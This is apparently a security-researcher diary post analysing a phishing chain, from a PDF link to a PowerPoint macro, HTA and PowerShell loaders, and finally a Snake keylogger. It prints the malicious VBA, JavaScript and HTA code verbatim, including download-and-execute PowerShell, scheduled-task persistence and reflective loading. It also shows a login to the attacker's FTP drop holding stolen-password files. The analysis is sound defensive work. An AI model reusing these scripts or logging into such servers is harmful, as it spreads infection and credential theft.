Simple PDF Linking to Malicious Content

Published: 2022-04-25
Last Updated: 2022-04-25 05:24:08 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Last week, I found an interesting piece of phishing based on a PDF file. Today, most of the PDF files that are delivered to end-user are not malicious, I mean that they don’t contain an exploit to trigger a vulnerability and infect the victim’s computer. They are just used as a transport mechanism to deliver more malicious content. Yesterday, Didier analyzed the same kind of Word document[1]. They are more and more common because they are (usually) not blocked by common filters at the perimeter.

The PDF file (SHA256:f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01) has a VT score of 1/58 and display a nice message:

The PDF is obfuscated in a classic way, all objects are embedded in an Object Stream:

remnux@remnux:/MalwareZoo/20220425$ pdfid.py f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01.pdf -n
PDFiD 0.2.8 foo.pdf
 PDF Header: %PDF-1.5
 obj                   25
 endobj                25
 stream                23
 endstream             23
 startxref              1
 /ObjStm                1
 /AcroForm              1

The file has a /URI keyword that points to the malicious URL:

remnux@remnux://MalwareZoo/20220425$ pdf-parser.py -O f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01.pdf -k /URI
  /URI (hxxps://www[.]mediafire[.]com/file/fwxhm1vylsg3nl3/7.ppam/file)

To visit the malicious URL, the victim has to click on the picture displayed above, this is made in the PDF file via the /Annot object:

remnux@remnux://MalwareZoo/20220425$ pdf-parser.py -O f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01.pdf -o 22
obj 22 0
 Containing /ObjStm: 1 0
 Type: /Annot
 Referencing: 27 0 R, 28 0 R

  <<
    /Type /Annot
    /Subtype /Link
    /A 27 0 R
    /Rect [1 0 613 791]
    /BS 28 0 R
  >>

remnux@remnux://MalwareZoo/20220425$ pdf-parser.py -O f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01.pdf -o 27
obj 27 0
 Containing /ObjStm: 1 0
 Type: /Action
 Referencing: 

  <<
    /Type /Action
    /S /URI
    /URI (hxxps://www[.]mediafire[.]com/file/fwxhm1vylsg3nl3/7.ppam/file)
  >>

When you visit the URL, you fill fetch a malicious PowerPoint file: 7.ppam (SHA256:2198abfdf736586893afe8e15153369299d3164e036920ff19c83043ba4ce54b) (VT score: 21/64)

remnux@remnux:/MalwareZoo/20220425$ zipdump.py 7.ppam
Index Filename                                      Encrypted Timestamp           
    1 [Content_Types].xml                                   0 2022-04-06 13:56:56 
    2 _rels/.rels                                           0 1980-01-01 00:00:00 
    3 ppt/_rels/presentation.xml.rels                       0 2022-04-06 13:57:10 
    4 ppt/presentation.xml                                  0 1980-01-01 00:00:00 
    5 ppt/slideLayouts/_rels/slideLayout5.xml.rels          0 1980-01-01 00:00:00 
    6 ppt/slideLayouts/_rels/slideLayout8.xml.rels          0 1980-01-01 00:00:00 
    7 ppt/slideLayouts/_rels/slideLayout9.xml.rels          0 1980-01-01 00:00:00 
    8 ppt/slideLayouts/_rels/slideLayout10.xml.rels         0 1980-01-01 00:00:00 
    9 ppt/slideLayouts/_rels/slideLayout11.xml.rels         0 1980-01-01 00:00:00 
   10 ppt/slideLayouts/_rels/slideLayout7.xml.rels          0 1980-01-01 00:00:00 
   11 ppt/slideLayouts/_rels/slideLayout6.xml.rels          0 1980-01-01 00:00:00 
   12 ppt/slideMasters/_rels/slideMaster1.xml.rels          0 1980-01-01 00:00:00 
   13 ppt/slideLayouts/_rels/slideLayout1.xml.rels          0 1980-01-01 00:00:00 
   14 ppt/slideLayouts/_rels/slideLayout2.xml.rels          0 1980-01-01 00:00:00 
   15 ppt/slideLayouts/_rels/slideLayout3.xml.rels          0 1980-01-01 00:00:00 
   16 ppt/slideLayouts/slideLayout11.xml                    0 1980-01-01 00:00:00 
   17 ppt/slideLayouts/slideLayout10.xml                    0 1980-01-01 00:00:00 
   18 ppt/slideLayouts/slideLayout9.xml                     0 1980-01-01 00:00:00 
   19 ppt/slideMasters/slideMaster1.xml                     0 1980-01-01 00:00:00 
   20 ppt/slideLayouts/slideLayout1.xml                     0 1980-01-01 00:00:00 
   21 ppt/slideLayouts/slideLayout2.xml                     0 1980-01-01 00:00:00 
   22 ppt/slideLayouts/slideLayout3.xml                     0 1980-01-01 00:00:00 
   23 ppt/slideLayouts/slideLayout4.xml                     0 1980-01-01 00:00:00 
   24 ppt/slideLayouts/slideLayout5.xml                     0 1980-01-01 00:00:00 
   25 ppt/slideLayouts/slideLayout6.xml                     0 1980-01-01 00:00:00 
   26 ppt/slideLayouts/slideLayout7.xml                     0 1980-01-01 00:00:00 
   27 ppt/slideLayouts/slideLayout8.xml                     0 1980-01-01 00:00:00 
   28 ppt/slideLayouts/_rels/slideLayout4.xml.rels          0 1980-01-01 00:00:00 
   29 ppt/theme/theme1.xml                                  0 1980-01-01 00:00:00 
   30 ppt/ksjksj.~text~TEXT~TEXT~                           0 1980-01-01 00:00:00 
   31 docProps/thumbnail.jpeg                               0 2022-02-07 22:50:16 
   32 ppt/presProps.xml                                     0 1980-01-01 00:00:00 
   33 ppt/tableStyles.xml                                   0 1980-01-01 00:00:00 
   34 ppt/viewProps.xml                                     0 1980-01-01 00:00:00 
   35 docProps/app.xml                                      0 1980-01-01 00:00:00 
   36 docProps/core.xml                                     0 1980-01-01 00:00:00 

The stream ID 30 looks the most interesting. It contains indeed a macro:

remnux@remnux:/MalwareZoo/20220425$ zipdump.py 7.ppam -s 30 -d | oledump.py 
  1:       516 'PROJECT'
  2:        26 'PROJECTwm'
  3: M    5457 'VBA/Module1'
  4:      2463 'VBA/_VBA_PROJECT'
  5:       529 'VBA/dir'

remnux@remnux:/MalwareZoo/20220425$ zipdump.py 7.ppam -s 30 -d | oledump.py -s 3 -v
Attribute VB_Name = "Module1"
Sub Auto_Open()

:::::: MsgBox "error! Re-install office":::::: Dim koaksdokasd As String:::::: koakosdk = "!@##!!@%^@^^n&&$%#g&&$%#tcar:":::::: koakosdk = Replace(koakosdk, "!@##!", "W"):::::: koakosdk = Replace(koakosdk, "!@%^@^^", "i"):::::: koakosdk = Replace(koakosdk, "car", "s"):::::: koakosdk = Replace(koakosdk, "&&$%#", "m"):::::: askjdjawjkdokawod = "askjdjawjkdokawod5nooo_Proce66":::::: askjdjawjkdokawod = Replace(askjdjawjkdokawod, "askjdjawjkdokawod", "W"):::::: askjdjawjkdokawod = Replace(askjdjawjkdokawod, "5", "i"):::::: askjdjawjkdokawod = Replace(askjdjawjkdokawod, "ooo", "32"):::::: askjdjawjkdokawod = Replace(askjdjawjkdokawod, "6", "s")

:::::: koaksdokasd = "C:\Users\Public\update.js":::::: Close::::::     Open koaksdokasd For Output As #1:::::: Print #1, "function _0x2a39(_0x56d387,_0x4f348e){var _0x98da71=_0x98da();return _0x2a39=function(_0x2a392c,_0xb2ca10){_0x2a392c=_0x2a392c-0x19c;var _0x3d14a3=_0x98da71[_0x2a392c];return _0x3d14a3;},_0x2a39(_0x56d387,_0x4f348e);}function _0x98da(){var _0x4db6f6=['SpawnInstance_','30XpBDce','C:\x5cProgramData\x5cddond.com','2WjTghW','Win32_ProcessStartup','3551556ACfgms','CopyFile','1902954vylczN','Get','7dmvGMR','ShowWindow','155sBzhfb','winmgmts:','C:\x5cProgramData\x5cddond.com\x20hxxps://www[.]mediafire[.]com/file/d2oqymifkgxft56/7.htm/file','1058001GaUEEA','Create','24OTupMg','2802371DmNBod','146204AuCDSo','632050FwjRPn','3495483BWCpkS'];"

:::::: Print #1, "_0x98da=function(){return _0x4db6f6;};return _0x98da();}var _0x550d40=_0x2a39;(function(_0x3935a0,_0x1de856){var _0x57a7a7=_0x2a39,_0xff11fe=_0x3935a0();while(!![]){try{var _0x2a1df1=-parseInt(_0x57a7a7(0x1a4))/0x1*(-parseInt(_0x57a7a7(0x19f))/0x2)+parseInt(_0x57a7a7(0x1af))/0x3+parseInt(_0x57a7a7(0x19e))/0x4*(-parseInt(_0x57a7a7(0x1ac))/0x5)+parseInt(_0x57a7a7(0x1a8))/0x6*(parseInt(_0x57a7a7(0x1aa))/0x7)+parseInt(_0x57a7a7(0x19c))/0x8*(parseInt(_0x57a7a7(0x1a0))/0x9)+parseInt(_0x57a7a7(0x1a2))/0xa*(-parseInt(_0x57a7a7(0x19d))/0xb)+parseInt(_0x57a7a7(0x1a6))/0xc;"

:::::: Print #1, "if(_0x2a1df1===_0x1de856)break;else _0xff11fe['push'](_0xff11fe['shift']());}catch(_0x589b6a){_0xff11fe['push'](_0xff11fe['shift']());}}}(_0x98da,0xd3564),megamon=_0x550d40(0x1a3));var dihearter=new ActiveXObject('Scripting.FileSystemObject'),pit=dihearter[_0x550d40(0x1a7)]('C:\x5cWindows\x5cSystem32\x5cmshta.exe',megamon);KALYJA=_0x550d40(0x1ae);var w32ps=GetObject(_0x550d40(0x1ad))[_0x550d40(0x1a9)](_0x550d40(0x1a5));w32ps[_0x550d40(0x1a1)](),w32ps[_0x550d40(0x1ab)]=0x0;var rtrnCode=GetObject(_0x550d40(0x1ad))[_0x550d40(0x1a9)]('Win32_Process')[_0x550d40(0x1b0)](KALYJA,null,w32ps,null);":::::: Close::::::::::::::::::::::::::::::::::::: GetObject(koakosdk) _
. _
Get(askjdjawjkdokawod) _
. _
Create ("wscript C:\Users\Public\update.js")
End Sub

No need to deobfuscate the macro completely, we see interesting strings (in red). The next payload is downloaded and then executed through mshta.exe.

<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION ID="CS"
APPLICATIONNAME="Downloader"
WINDOWSTATE="minimize"
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
CAPTION="no"
SHOWINTASKBAR="no">

<script>
chuchukukukaokiwDasidow = new ActiveXObject('Wscript.Shell');
kiii = "C:\\ProgramData\\ESETNONU.com";

var king = new ActiveXObject("Scripting.FileSystemObject");var pit = king.CopyFile ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Powershell.exe", k
iii);

cmd = "C:\\ProgramData\\ESETNONU.com -EP B -NoP -c i'e'x([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('hxxps://www[.]mediafire[.]com/file
/w2uuz1cy4cl2gup/7.dll/file').GetResponse().GetResponseStream()).ReadToend());";

var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup');w32ps.SpawnInstance_();w32ps.ShowWindow=0;var rtrnCode=GetObject('winmgmts:').Get('Win32_
Process').Create(cmd,null,w32ps,null);

chuchukukukaokiwDasidow.Run('schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr """%programdata%\\milon.com' + '""""""' + 'hxxps://www[.]mediafire[.]
com/file/3k4f9iglvljn9kt/7.htm/file"""',0);

megamon = "C:\\ProgramData\\milon.com";
var dihearter = new ActiveXObject("Scripting.FileSystemObject");var pit = dihearter.CopyFile ("C:\\Windows\\System32\\mshta.exe", megamon);

chuchukukukaokiwDasidow.Run("taskkill /f /im WinWord.exe",0);
chuchukukukaokiwDasidow.Run("taskkill /f /im Excel.exe",0);
chuchukukukaokiwDasidow.Run("taskkill /f /im POWERPNT.exe",0);

window.close();

</script>
</head>
<body>
</body>
</html>

You can see that the script implements persistence through a scheduled task and tries also to kill some processes. It fetches the next stage again from mediafire.com but it does not fetch a DLL. It's another script. It is a PowerShell script with some Base64 content:

remnux@remnux:/MalwareZoo/20220425$ base64dump.py 7.dll
ID  Size    Encoded          Decoded          md5 decoded                     
--  ----    -------          -------          -----------                     
 1:       4 Text             M.m              3d0b353fa22a0001c9a7fda13f7c638e
 2:       8 Encoding         .w(v).           02b746b5b6358014a5294544d71a4dd7
 3:      16 FromBase64String ..&.......).     4cfff9a87d891e1961d358c98991e469
 4:    3560 QWRkLVR5cGUgLXR5 Add-Type -typede 0a9525d9ff1e87418c0b5c496546f889
 5:       4 byte             o+^              50d0380b0362cc343a78fa4231fffe0f
 6:       4 nona             ...              8a773bb6add7d540b7c92c1ec8b22870
 7:       4 Text             M.m              3d0b353fa22a0001c9a7fda13f7c638e
 8:       8 Encoding         .w(v).           02b746b5b6358014a5294544d71a4dd7
 9:      16 FromBase64String ..&.......).     4cfff9a87d891e1961d358c98991e469
10:   53872 W2J5dGVbXV0gJFNU [byte[]] $STRDYF adddffbf83acb22aaeccc45b897e99c3

The most interesting stream IDs look to be 4 and 10. Stream ID 4 contains the code to deobfuscate the second one. Let's check ID 10:

[byte[]] $STRDYFUGIHUYTYRTESRDYUGIRI =@(31,139,8,0,0,0,0,0,4,0,237,125,9,96,91,213,177,232,185,87,210,213,98,89,182,188,39,177,19,101,33,113,156,196,
... Stuff deleted ...
,169,182,152,105,157,58,250,129,8,15,178,241,99,153,24,104,242,117,245,190,185,254,7,175,109,194,239,216,213,150,255,179,21,249,230,250,103,92,255,7,238,182,245,33,0,108,0,0)

[byte[]] $RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH = Get-DecompressedByteArray $nona
[byte[]] $RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG =Get-DecompressedByteArray $STRDYFUGIHUYTYRTESRDYUGIRI

$FGCHJBKHVGCFHJVBKNBHVGJB = D4FD5C5B9266824C4EEFRWEOIURWDQWOIDUQW389C83E0C69FD3FAAG -TypeName 'System.Collections.ArrayList';
$FGCHJBKHVGCFHJVBKNBHVGJB.Add("W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRSRFNGR1RGSFlHVUpIS0dZRlREUlNSRFRGWUdKVUhLRERSVEZZRykuR2V0VHlwZSgncHJvakZVRC5QQScpLkdldE1ldGhvZCgnRXhlY3V0ZScpLkludm9rZSgkbnVsbCxbb2JqZWN0W11dICggJ0M6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxhc3BuZXRfcmVnYnJvd3NlcnMuZXhlJywkUlNFVERZVUdVSURSU1RSRFlVR0lIT1lSVFNFVFJUWURVR0lPSCkp")

$FGCHJBKHVGCFHJVBKNBHVGJBA = COMBINEMEANINGSCOBOLTPOTASSIUM($FGCHJBKHVGCFHJVBKNBHVGJB)

$RDTTFYGJHKUYGTFRYTFYGUHIJGYYGU = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($FGCHJBKHVGCFHJVBKNBHVGJBA);try{$n=0;while($n -lt 3){&(GCM I*e-E*)($Run=($RDTTFYGJHKUYGTFRYTFYGUHIJGYYGU -Join ''));$n++}}catch{}
[Reflection.Assembly]::Load($RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG).GetType('projFUD.PA').GetMethod('Execute').Invoke($null,[object[]] ( 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe',$RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH))

The scripts dumps and executes a PE file (SHA256:039c261036b80fd500607279933c43c4f1c78fdba1b54a9edbc8217df49ec154) that is not present on VT at this time. I uploaded it on Malware Bazaar[4].

The first analysis reports it as a Snake keylogger:

{ 
  "family": "snakekeylogger", 
  "rule": "SnakeKeylogger", 
  "credentials": [ 
    { 
       "protocol": "ftp", 
       "host": "ftp://103[.]147[.]185[.]85/", 
       "port": 21, 
       "username": "bvhfgas7", 
       "password": "xxxxxxxx" 
    } 
  ] 
}

The malware seems active based on the collected data that I found:

remnux@remnux:/MalwareZoo/20220425$ ftp 103[.]147[.]185[.]85
Connected to 103[.]147[.]185[.]85.
220-FileZilla Server version 0.9.41 beta
220-written by Tim Kosse (Tim.Kosse@gmx.de)
220 Please visit http://sourceforge.net/projects/filezilla/
Name (103[.]147[.]185[.]85:root): bvhfgas7
331 Password required for bvhfgas7
Password:
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -l
229 Entering Extended Passive Mode (|||65003|)
150 Connection accepted
-rw-r--r-- 1 ftp ftp            316 Apr 05 02:06 AMAZING-AVOCADO - Passwords ID - ZyiAEnXWZP1101827263.txt
-rw-r--r-- 1 ftp ftp            316 Apr 05 02:06 AMAZING-AVOCADO - Passwords ID - ZyiAEnXWZP1872355191.txt
-rw-r--r-- 1 ftp ftp            293 Apr 24 22:06 AUVQQRRF - Passwords ID - ZyiAEnXWZP532723221.txt
-rw-r--r-- 1 ftp ftp            292 Apr 05 19:53 CPJISPWT - Passwords ID - ZyiAEnXWZP1110184397.txt
-rw-r--r-- 1 ftp ftp            292 Apr 05 19:55 CPJISPWT - Passwords ID - ZyiAEnXWZP1883154258.txt
-rw-r--r-- 1 ftp ftp            292 Apr 05 19:52 CPJISPWT - Passwords ID - ZyiAEnXWZP2014006797.txt
-rw-r--r-- 1 ftp ftp            292 Apr 05 19:53 CPJISPWT - Passwords ID - ZyiAEnXWZP2067984079.txt
-rw-r--r-- 1 ftp ftp            292 Apr 05 19:53 CPJISPWT - Passwords ID - ZyiAEnXWZP384268998.txt
-rw-r--r-- 1 ftp ftp            292 Apr 05 19:55 CPJISPWT - Passwords ID - ZyiAEnXWZP506198539.txt
-rw-r--r-- 1 ftp ftp            292 Apr 05 19:55 CPJISPWT - Passwords ID - ZyiAEnXWZP573982685.txt
-rw-r--r-- 1 ftp ftp            292 Apr 05 19:52 CPJISPWT - Passwords ID - ZyiAEnXWZP637051078.txt
-rw-r--r-- 1 ftp ftp            292 Apr 05 19:53 CPJISPWT - Passwords ID - ZyiAEnXWZP878300114.txt
-rw-r--r-- 1 ftp ftp            301 Apr 06 04:56 DESKTOP-D019GDM - Passwords ID - ZyiAEnXWZP1360583859.txt
-rw-r--r-- 1 ftp ftp            301 Apr 06 04:56 DESKTOP-D019GDM - Passwords ID - ZyiAEnXWZP1592468142.txt
-rw-r--r-- 1 ftp ftp            301 Apr 06 04:56 DESKTOP-D019GDM - Passwords ID - ZyiAEnXWZP1711955750.txt
-rw-r--r-- 1 ftp ftp            301 Apr 06 04:56 DESKTOP-D019GDM - Passwords ID - ZyiAEnXWZP1868796841.txt
-rw-r--r-- 1 ftp ftp            300 Apr 04 23:18 DESKTOP-D019GDM - Passwords ID - ZyiAEnXWZP609212224.txt
-rw-r--r-- 1 ftp ftp            293 Apr 24 22:06 JVJHUWZP - Passwords ID - ZyiAEnXWZP1117034868.txt
-rw-r--r-- 1 ftp ftp             38 Mar 29 20:43 Snake Keylogger - YrTVKTaWocPKgCyA - 222139415.txt
-rw-r--r-- 1 ftp ftp            293 Apr 24 22:11 WIN7X64 - Passwords ID - ZyiAEnXWZP1161416015.txt
226 Transfer OK

[1] https://isc.sans.edu/forums/diary/Analyzing+a+Phishing+Word+Document/28562/
[2] https://www.virustotal.com/gui/file/f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01
[3] https://www.virustotal.com/gui/file/2198abfdf736586893afe8e15153369299d3164e036920ff19c83043ba4ce54b
[4] https://bazaar.abuse.ch/sample/039c261036b80fd500607279933c43c4f1c78fdba1b54a9edbc8217df49ec154/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)

Comments


Diary Archives